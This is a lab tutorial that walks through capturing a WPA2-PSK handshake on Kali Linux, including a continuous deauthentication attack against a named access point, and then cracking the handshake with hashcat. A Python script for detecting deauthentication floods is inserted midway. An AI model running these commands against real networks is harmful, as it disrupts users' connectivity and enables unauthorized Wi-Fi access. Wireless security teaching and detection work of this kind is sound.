How To Capture a WPA2-PSK Handshake on Kali Linux 2018.4


In this lab I will show how to capture the WPA2 four-way handshake using Kali Linux and then crack the captured file with hashcat.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the user's actions.

Step 1: Enable Monitor Mode On a Supported WiFi Card

1.1.a Display the wireless cards

sudo iwconfig
root@GalaxyS9:~#sudo iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

root@GalaxyS9:~# 

1.2 Enable monitor mode

sudo airmon-ng start wlan0
root@GalaxyS9:~#sudo airmon-ng start wlan0

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

   PID Name
   612 NetworkManager
   691 dhclient
  1403 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		rt2800usb	Ralink Technology, Corp. RT5572

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

root@GalaxyS9:~# 

1.3 Display the newly created virtual interface, wlan0mon

sudo iwconfig
root@GalaxyS9:~# sudo iwconfig
lo        no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
eth0      no wireless extensions.

root@GalaxyS9:~# 

Step 2: Use Airodump To Capture Packets

2.1.a Start sniffing nearby traffic

sudo airodump-ng wlan0mon

Use the command below to sniff nearby traffic and save the captured packets into a file

sudo airodump-ng wlan0mon --write my_file

2.1.b Let it run for a while, then stop the capture; the file will contain the BSSID and the channel of each access point seen

Step 3: Capture The WPA2-PSK Handshake

3.1 Use airodump-ng to record the traffic from a specific access point. Copy the BSSID and the channel number from the file created in the previous step

sudo airodump-ng wlan0mon --bssid F0:9F:C0:AA:6C:B8 -c 6 --write test01

3.2.a Open a new terminal window and launch a deauth attack with aireplay-ng

sudo aireplay-ng --deauth 0 -a F0:9F:C0:AA:6C:B8 wlan0mon

3.2.b Go back to terminal 1 and stop the capture once "WPA handshake" appears in the top line of the airodump-ng output

 CH  6 ][ Elapsed: 2 mins ][ 2018-12-06 20:26 ][ WPA handshake: F0:9F:C0:AA:6C:B8

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 F0:9F:C0:AA:6C:B8  -59  40      899      174    0   6  195  WPA2 CCMP   PSK  hemam

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 F0:9F:C0:AA:6C:B8  F4:BF:80:C7:EC:56  -31    1e- 1e     0       70  hemam

^Croot@GalaxyS9:~# 

3.2.c Stop the deauth attack in terminal 2

3.3.a Confirm the captured handshake with aircrack-ng

sudo aircrack-ng test01.cap
root@GalaxyS9:~# sudo aircrack-ng test01.cap
Opening test01.capse wait...
Read 87180 packets.

   #  BSSID              ESSID                     Encryption

   1  F0:9F:C0:AA:6C:B8  hemam                    WPA (1 handshake)

Choosing first network as target.

Opening test01.capse wait...
Read 87180 packets.

1 potential targets

Please specify a dictionary (option -w).


Quitting aircrack-ng...
root@GalaxyS9:~#  
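The deauthentication burst from step 3.2 is also the pattern a wireless intrusion detection system looks for: a real access point does not emit dozens of broadcast deauthentication frames per second, so a flood of them carrying the AP's own address in a capture like test01.cap is a strong signal that a client was forced to re-associate. The script below is an added example and is not part of this tutorial or of the aircrack-ng suite. It reads a pcap with the standard library only (link type 105, raw 802.11, or 127, radiotap plus 802.11), counts deauth/disassoc management frames per sender and BSSID inside a sliding one-second window, and reports bursts over a threshold. The MAC addresses and the embedded sample capture are constructed for the example, and the window and threshold values are assumptions to tune for your environment.

```python
# Added example (not from the tutorial): flag deauthentication floods in an
# 802.11 capture using only the Python standard library.
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105            # raw 802.11 frames
LINKTYPE_IEEE802_11_RADIOTAP = 127   # radiotap header followed by 802.11
BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE_NAMES = {10: "disassoc", 12: "deauth"}   # management subtypes of interest


def _mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_pcap(data):
    """Return [(timestamp_seconds, raw_80211_frame), ...] from pcap bytes."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":          # little-endian, microseconds
        endian, ts_div = "<", 1_000_000.0
    elif magic == b"\xa1\xb2\xc3\xd4":        # big-endian, microseconds
        endian, ts_div = ">", 1_000_000.0
    elif magic == b"\x4d\x3c\xb2\xa1":        # little-endian, nanoseconds
        endian, ts_div = "<", 1_000_000_000.0
    elif magic == b"\xa1\xb2\x3c\x4d":        # big-endian, nanoseconds
        endian, ts_div = ">", 1_000_000_000.0
    else:
        raise ValueError("not a pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype not in (LINKTYPE_IEEE802_11, LINKTYPE_IEEE802_11_RADIOTAP):
        raise ValueError(f"unsupported link type {linktype}")
    frames, off = [], 24
    while off + 16 <= len(data):
        sec, frac, incl, _orig = struct.unpack(endian + "IIII", data[off:off + 16])
        pkt = data[off + 16:off + 16 + incl]
        off += 16 + incl
        if linktype == LINKTYPE_IEEE802_11_RADIOTAP:
            if len(pkt) < 4:
                continue
            rt_len = struct.unpack("<H", pkt[2:4])[0]   # radiotap length is always LE
            pkt = pkt[rt_len:]
        frames.append((sec + frac / ts_div, pkt))
    return frames


def classify_mgmt(frame):
    """Return a dict describing a deauth/disassoc frame, or None for anything else."""
    if len(frame) < 26:                       # 24-byte header + 2-byte reason code
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or subtype not in SUBTYPE_NAMES:
        return None
    return {
        "kind": SUBTYPE_NAMES[subtype],
        "dst": _mac(frame[4:10]),
        "src": _mac(frame[10:16]),
        "bssid": _mac(frame[16:22]),
        "reason": struct.unpack("<H", frame[24:26])[0],
    }


def find_deauth_bursts(frames, window=1.0, threshold=10):
    """Alert when one (src, bssid) pair sends >= threshold deauth/disassoc
    frames within any `window` seconds; broadcast floods are marked as such."""
    times = defaultdict(list)
    for ts, frame in frames:
        info = classify_mgmt(frame)
        if info:
            times[(info["src"], info["bssid"], info["dst"] == BROADCAST)].append(ts)
    alerts = []
    for (src, bssid, bcast), ts_list in times.items():
        ts_list.sort()
        best, i, start, end = 0, 0, None, None
        for j, t in enumerate(ts_list):       # two-pointer sliding window
            while t - ts_list[i] > window:
                i += 1
            if j - i + 1 > best:
                best, start, end = j - i + 1, ts_list[i], t
        if best >= threshold:
            alerts.append({"src": src, "bssid": bssid, "broadcast": bcast,
                           "count": best, "start": start, "end": end})
    return alerts


def _mgmt_frame(subtype, dst, src, bssid, body):
    fc = bytes([(subtype << 4) | 0x00, 0x00])          # type 0 = management
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body


def build_sample_pcap():
    """Constructed capture: beacons, one legitimate deauth, then a broadcast
    deauth burst carrying the AP's address (the step 3.2 pattern)."""
    ap = bytes.fromhex("020000000a01")       # constructed locally-administered MACs
    sta = bytes.fromhex("020000000b02")
    bcast = b"\xff" * 6
    records = [(k * 0.1, _mgmt_frame(8, bcast, ap, ap, b"\x00" * 12)) for k in range(10)]
    records.append((2.0, _mgmt_frame(12, ap, sta, ap, struct.pack("<H", 3))))   # STA leaving
    for k in range(50):                      # 50 broadcast deauths in half a second
        records.append((10.0 + k * 0.01, _mgmt_frame(12, bcast, ap, ap, struct.pack("<H", 7))))
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for ts, frame in records:
        sec, usec = int(ts), int(round((ts - int(ts)) * 1_000_000))
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    for a in find_deauth_bursts(parse_pcap(build_sample_pcap())):
        print(f"ALERT {a['src']} -> bssid {a['bssid']} broadcast={a['broadcast']} "
              f"{a['count']} frames between {a['start']:.2f}s and {a['end']:.2f}s")
```

To run it against a real file, replace build_sample_pcap() with the bytes of the capture (open("test01.cap", "rb").read()); the single polite deauth from the station stays below the threshold while the burst is reported.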

Step 4: Convert The Captured Cap File

4.1 The captured .cap file needs to be converted to hccapx format before hashcat can use it. The hashcat team host a site where you can upload a WPA/WPA2 pcap capture file and convert it to a hashcat capture file. Keep in mind that uploading sends the capture, including the network name and handshake material, to a third party; if that is a concern, convert it locally instead.

Open https://hashcat.net/cap2hccapx/ and upload the file.

Please follow the guide on how to crack the converted file using hashcat on Windows.
